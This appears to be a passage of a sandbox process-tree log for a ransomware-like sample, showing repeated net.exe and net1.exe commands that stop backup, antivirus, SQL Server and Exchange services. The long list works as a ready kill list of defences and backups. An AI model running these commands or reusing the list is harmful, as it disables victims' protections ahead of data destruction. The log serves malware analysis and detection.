C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y4⤵PID:4168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y5⤵PID:16956
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y4⤵PID:4756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y5⤵PID:15500
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y4⤵PID:4224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y5⤵PID:15140
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y4⤵PID:4556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y5⤵PID:13416
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y4⤵PID:5032
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y5⤵PID:13408
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y4⤵PID:4784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y5⤵PID:15880
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y4⤵PID:4940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y5⤵PID:14748
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y4⤵PID:4732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y5⤵PID:16276
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y4⤵PID:2900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y5⤵PID:15484
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y4⤵PID:1752
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y5⤵PID:16716
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y4⤵PID:3948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y5⤵PID:15268
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y4⤵PID:3204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y5⤵PID:14948
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y4⤵PID:2496
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y5⤵PID:15540
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y4⤵PID:3724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y5⤵PID:16160
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y4⤵PID:3536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y5⤵PID:15724
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y4⤵PID:3940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y5⤵PID:15828
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y4⤵PID:4452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y5⤵PID:15028
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y4⤵PID:3988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y5⤵PID:14860
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y4⤵PID:4564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y5⤵PID:14808
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Acronis VSS Provider” /y4⤵PID:4896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y5⤵PID:14824
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer /y4⤵PID:4080
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y5⤵PID:15004
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop IISAdmin /y4⤵PID:212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y5⤵PID:13424
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeES /y4⤵PID:3556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y5⤵PID:13952
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Agent” /y4⤵PID:2356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y5⤵PID:14464
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EraserSvc11710 /y4⤵PID:3476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y5⤵PID:15756
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Enterprise Client Service” /y4⤵PID:4580
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y5⤵PID:14816
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQL Backups /y4⤵PID:5060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y5⤵PID:15020
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer100 /y4⤵PID:1092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y5⤵PID:15284
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetMsmqActivator /y4⤵PID:2848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y5⤵PID:16424
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeIS /y4⤵PID:2820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y5⤵PID:16136
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y4⤵PID:4048
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y5⤵PID:14996
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SamSs /y4⤵PID:936
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y5⤵PID:14908
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer /y4⤵PID:1520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y5⤵PID:13964
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Backup Service” /y4⤵PID:5124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y5⤵PID:16036
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer110 /y4⤵PID:5140
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y5⤵PID:16896
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop POP3Svc /y4⤵PID:5148
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3Svc /y5⤵PID:15508
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMGMT /y4⤵PID:5164
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y5⤵PID:15356
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Clean Service” /y4⤵PID:5172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y5⤵PID:14776
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SMTPSvc /y4⤵PID:5188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y5⤵PID:14844
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Filter Service” /y4⤵PID:5196
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y5⤵PID:15156
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql$PROD /y4⤵PID:5204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y5⤵PID:15332
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SstpSvc /y4⤵PID:5212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SstpSvc /y5⤵PID:13912
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMTA /y4⤵PID:5220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y5⤵PID:16888
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Device Control Service” /y4⤵PID:5228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y5⤵PID:17164
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y4⤵PID:5236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y5⤵PID:16700
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y4⤵PID:5244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y5⤵PID:16004
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y4⤵PID:5252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y5⤵PID:15624
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop UI0Detect /y4⤵PID:5260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y5⤵PID:1508
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSA /y4⤵PID:5268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y5⤵PID:8
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos File Scanner Service” /y4⤵PID:5276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y5⤵PID:15856
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPS /y4⤵PID:5284
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y5⤵PID:16336
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y4⤵PID:5292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y5⤵PID:15748
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y4⤵PID:5300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y5⤵PID:14496
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop W3Svc /y4⤵PID:5308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3Svc /y5⤵PID:15716
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSRS /y4⤵PID:5316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y5⤵PID:16972
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Health Service” /y4⤵PID:5324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y5⤵PID:15732
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPSAMA /y4⤵PID:5332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y5⤵PID:16012
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Zoolz 2 Service” /y4⤵PID:5340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y5⤵PID:14836
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPS /y4⤵PID:5348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y5⤵PID:13208
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “aphidmonitorservice” /y4⤵PID:5356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y5⤵PID:15516
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeadtopology /y4⤵PID:5364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y5⤵PID:15404
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y4⤵PID:5372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y5⤵PID:15708
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y4⤵PID:5380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y5⤵PID:13936
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y4⤵PID:5388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y5⤵PID:15700
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “intel(r) proset monitoring service” /y4⤵PID:5396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y5⤵PID:15668
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y4⤵PID:5404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y5⤵PID:16456
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y4⤵PID:5412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y5⤵PID:15632
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y4⤵PID:5420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y5⤵PID:16880
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y4⤵PID:5428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y5⤵PID:16640
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y4⤵PID:5436
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y5⤵PID:14432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y4⤵PID:5444
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y5⤵PID:15532
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y4⤵PID:5452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y5⤵PID:14520
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ECWDB2 /y4⤵PID:5460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y5⤵PID:16448
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop audioendpointbuilder /y4⤵PID:5468
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y5⤵PID:16344
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Safestore Service” /y4⤵PID:5476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y5⤵PID:15764
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y4⤵PID:5484
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y5⤵PID:14980
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y4⤵PID:5492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y5⤵PID:3708
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos System Protection Service” /y4⤵PID:5500
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y5⤵PID:14964
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDeviceMediaService /y4⤵PID:5508
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y5⤵PID:15772
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y4⤵PID:5516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y5⤵PID:14480
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Web Control Service” /y4⤵PID:5524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y5⤵PID:14884
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y4⤵PID:5532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y5⤵PID:15452
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROD /y4⤵PID:5540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y5⤵PID:15176
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y4⤵PID:5548
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y5⤵PID:15780
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y4⤵PID:5556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y5⤵PID:14988
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y4⤵PID:5564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y5⤵PID:14968
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Antivirus /y4⤵PID:5572
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y5⤵PID:15108
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y4⤵PID:5580
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y5⤵PID:4772
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /4⤵PID:5588
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /5⤵PID:14852
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y4⤵PID:5596
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y5⤵PID:3272
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AVP /y4⤵PID:5604
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y5⤵PID:16168
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y4⤵PID:5612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y5⤵PID:15436
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y4⤵PID:5620
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y5⤵PID:4144
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DCAgent /y4⤵PID:5628
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y5⤵PID:5004
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y4⤵PID:5636
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y5⤵PID:16440
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y4⤵PID:5644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y5⤵PID:10840
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EhttpSrv /y4⤵PID:5652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y5⤵PID:13928
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MMS /y4⤵PID:5660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y5⤵PID:444
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y4⤵PID:5668
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y5⤵PID:10336
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ekrn /y4⤵PID:5676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y5⤵PID:13960
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mozyprobackup /y4⤵PID:5684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y5⤵PID:15996
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y4⤵PID:5692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y5⤵PID:14512
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPSecurityService /y4⤵PID:5700
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y5⤵PID:15988
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:5708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y5⤵PID:15872
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPS /y4⤵PID:5716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y5⤵PID:15980
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPUpdateService /y4⤵PID:5724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y5⤵PID:16656
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ntrtscan /y4⤵PID:5732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y5⤵PID:16260
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPSAMA /y4⤵PID:5740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y5⤵PID:14932
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EsgShKernel /y4⤵PID:5748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y5⤵PID:14444
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y4⤵PID:5756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y5⤵PID:15964
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:5764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y5⤵PID:14876
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ESHASRV /y4⤵PID:5772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ESHASRV /y5⤵PID:4700
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SDRSVC /y4⤵PID:5780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y5⤵PID:14488
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y4⤵PID:5788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y5⤵PID:13604
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FA_Scheduler /y4⤵PID:5796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y5⤵PID:15848
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:5804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y5⤵PID:16464
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵PID:5812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y5⤵PID:15300
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFS /y4⤵PID:5820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFS /y5⤵PID:14472
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y4⤵PID:5828
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y5⤵PID:15524
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y4⤵PID:5836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y5⤵PID:16184
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFSGT /y4⤵PID:5844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y5⤵PID:15864
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBackupSvc /y4⤵PID:5852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y5⤵PID:16352
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y4⤵PID:5860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y5⤵PID:16396
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop kavfsslp /y4⤵PID:5868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop kavfsslp /y5⤵PID:13980
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBrokerSvc /y4⤵PID:5876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y5⤵PID:15840
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y4⤵PID:5884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y5⤵PID:15276
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop klnagent /y4⤵PID:5892
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop klnagent /y5⤵PID:16304
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCatalogSvc /y4⤵PID:5900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y5⤵PID:14940
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵PID:5908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y5⤵PID:14440
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop macmnsvc /y4⤵PID:5916
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop macmnsvc /y5⤵PID:16284
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCloudSvc /y4⤵PID:5924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y5⤵PID:15812
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y4⤵PID:5932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y5⤵PID:15896
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop masvc /y4⤵PID:5940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop masvc /y5⤵PID:15788
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y4⤵PID:5948
